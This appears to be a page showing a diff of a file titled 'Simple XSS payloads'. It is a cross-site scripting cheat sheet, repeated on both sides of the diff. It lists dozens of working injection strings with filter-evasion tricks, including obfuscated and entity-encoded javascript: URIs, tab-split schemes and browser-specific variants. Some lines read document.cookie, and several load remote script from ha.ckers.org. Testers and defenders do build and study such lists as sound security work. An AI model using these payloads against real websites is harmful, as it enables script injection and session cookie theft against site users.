mmssr · January 27, 2022 16:26 · William-Zephyrine · Dec 9, 2025
diff --git a/Simple XSS payloads b/Simple XSS payloads
 " onfocus="alert(1)" name="bounty
 (Append #bounty to the URL and enjoy your zero interaction XSS )

 <svg/onload=location=`javas`+`cript:ale`+`rt%2`+`81%2`+`9`;//

 # Internet Explorer, Edge
 <svg><script>alert(1)<p>

 # Firefox

 <svg><x><script>alert(1)</x>

 # Common

 '';!--"<XSS>=&{()}

 <SCRIPT SRC=http://ha.ckers.org/xss.js></SCRIPT>

 <IMG SRC="javascript:alert('XSS');">

 <IMG SRC=javascript:alert('XSS')>

 <IMG SRC=JaVaScRiPt:alert('XSS')>

 <IMG SRC=javascript:alert("XSS")>

 <IMG SRC=`javascript:alert("RSnake says, 'XSS'")`>

 <a onmouseover="alert(document.cookie)">xxs link</a>

 <a onmouseover=alert(document.cookie)>xxs link</a>

 <IMG """><SCRIPT>alert("XSS")</SCRIPT>">

 <IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>

 <IMG SRC=# onmouseover="alert('xxs')">

 <IMG SRC= onmouseover="alert('xxs')">

 <IMG onmouseover="alert('xxs')">

 <IMG SRC=/ onerror="alert(String.fromCharCode(88,83,83))"></img>

 <IMG SRC=&#106;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;&#58;&#97;&#108;&#101;&#114;&#116;&#40;
 &#39;&#88;&#83;&#83;&#39;&#41;>

 <IMG SRC=&#0000106&#0000097&#0000118&#0000097&#0000115&#0000099&#0000114&#0000105&#0000112&#0000116&#0000058&#0000097&
 #0000108&#0000101&#0000114&#0000116&#0000040&#0000039&#0000088&#0000083&#0000083&#0000039&#0000041>

 <IMG SRC=&#x6A&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x70&#x74&#x3A&#x61&#x6C&#x65&#x72&#x74&#x28&#x27&#x58&#x53&#x53&#x27&#x29>

 <IMG SRC="jav	ascript:alert('XSS');">

 <IMG SRC="jav&#x09;ascript:alert('XSS');">

 <IMG SRC="jav&#x0A;ascript:alert('XSS');">

 <IMG SRC="jav&#x0D;ascript:alert('XSS');">

 <IMG SRC=" &#14;  javascript:alert('XSS');">

 <SCRIPT/XSS SRC="http://ha.ckers.org/xss.js"></SCRIPT>

 <BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert("XSS")>

 <SCRIPT/SRC="http://ha.ckers.org/xss.js"></SCRIPT>

 <<SCRIPT>alert("XSS");//<</SCRIPT>

 <SCRIPT SRC=http://ha.ckers.org/xss.js?< B >

 <SCRIPT SRC=//ha.ckers.org/.j>

 <IMG SRC="javascript:alert('XSS')"

 <iframe src=http://ha.ckers.org/scriptlet.html <

 \";alert('XSS');//



 </TITLE><SCRIPT>alert("XSS");</SCRIPT>


 <INPUT TYPE="IMAGE" SRC="javascript:alert('XSS');">

 <BODY BACKGROUND="javascript:alert('XSS')">

 <IMG DYNSRC="javascript:alert('XSS')">

 <IMG LOWSRC="javascript:alert('XSS')">

 <STYLE>li {list-style-image: url("javascript:alert('XSS')");}</STYLE><UL><LI>XSS</br>

 <IMG SRC='vbscript:msgbox("XSS")'>

 <IMG SRC="livescript:[code]">

 <BODY ONLOAD=alert('XSS')>
	" onfocus="alert(1)" name="bounty
	(Append #bounty to the URL and enjoy your zero interaction XSS )

	<svg/onload=location=`javas`+`cript:ale`+`rt%2`+`81%2`+`9`;//

	# Internet Explorer, Edge
	<svg><script>alert(1)<p>

	# Firefox

	<svg><x><script>alert(1)</x>

	# Common

	'';!--"<XSS>=&{()}

	<SCRIPT SRC=http://ha.ckers.org/xss.js></SCRIPT>

	<IMG SRC="javascript:alert('XSS');">

	<IMG SRC=javascript:alert('XSS')>

	<IMG SRC=JaVaScRiPt:alert('XSS')>

	<IMG SRC=javascript:alert("XSS")>

	<IMG SRC=`javascript:alert("RSnake says, 'XSS'")`>

	<a onmouseover="alert(document.cookie)">xxs link</a>

	<a onmouseover=alert(document.cookie)>xxs link</a>

	<IMG """><SCRIPT>alert("XSS")</SCRIPT>">

	<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>

	<IMG SRC=# onmouseover="alert('xxs')">

	<IMG SRC= onmouseover="alert('xxs')">

	<IMG onmouseover="alert('xxs')">

	<IMG SRC=/ onerror="alert(String.fromCharCode(88,83,83))"></img>

	<IMG SRC=javascript:alert(
	'XSS')>

	<IMG SRC=&#0000106&#0000097&#0000118&#0000097&#0000115&#0000099&#0000114&#0000105&#0000112&#0000116&#0000058&#0000097&
	#0000108&#0000101&#0000114&#0000116&#0000040&#0000039&#0000088&#0000083&#0000083&#0000039&#0000041>

	<IMG SRC=&#x6A&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x70&#x74&#x3A&#x61&#x6C&#x65&#x72&#x74&#x28&#x27&#x58&#x53&#x53&#x27&#x29>

	<IMG SRC="jav ascript:alert('XSS');">

	<IMG SRC="jav ascript:alert('XSS');">

	<IMG SRC="jav ascript:alert('XSS');">

	<IMG SRC="jav ascript:alert('XSS');">

	<IMG SRC=" javascript:alert('XSS');">

	<SCRIPT/XSS SRC="http://ha.ckers.org/xss.js"></SCRIPT>

	<BODY onload!#$%&()*~+-_.,:;?@[/\|\]^`=alert("XSS")>

	<SCRIPT/SRC="http://ha.ckers.org/xss.js"></SCRIPT>

	<<SCRIPT>alert("XSS");//<</SCRIPT>

	<SCRIPT SRC=http://ha.ckers.org/xss.js?< B >

	<SCRIPT SRC=//ha.ckers.org/.j>

	<IMG SRC="javascript:alert('XSS')"

	<iframe src=http://ha.ckers.org/scriptlet.html <

	\";alert('XSS');//



	</TITLE><SCRIPT>alert("XSS");</SCRIPT>


	<INPUT TYPE="IMAGE" SRC="javascript:alert('XSS');">

	<BODY BACKGROUND="javascript:alert('XSS')">

	<IMG DYNSRC="javascript:alert('XSS')">

	<IMG LOWSRC="javascript:alert('XSS')">

	<STYLE>li {list-style-image: url("javascript:alert('XSS')");}</STYLE><UL><LI>XSS</br>

	<IMG SRC='vbscript:msgbox("XSS")'>

	<IMG SRC="livescript:[code]">

	<BODY ONLOAD=alert('XSS')>
No results found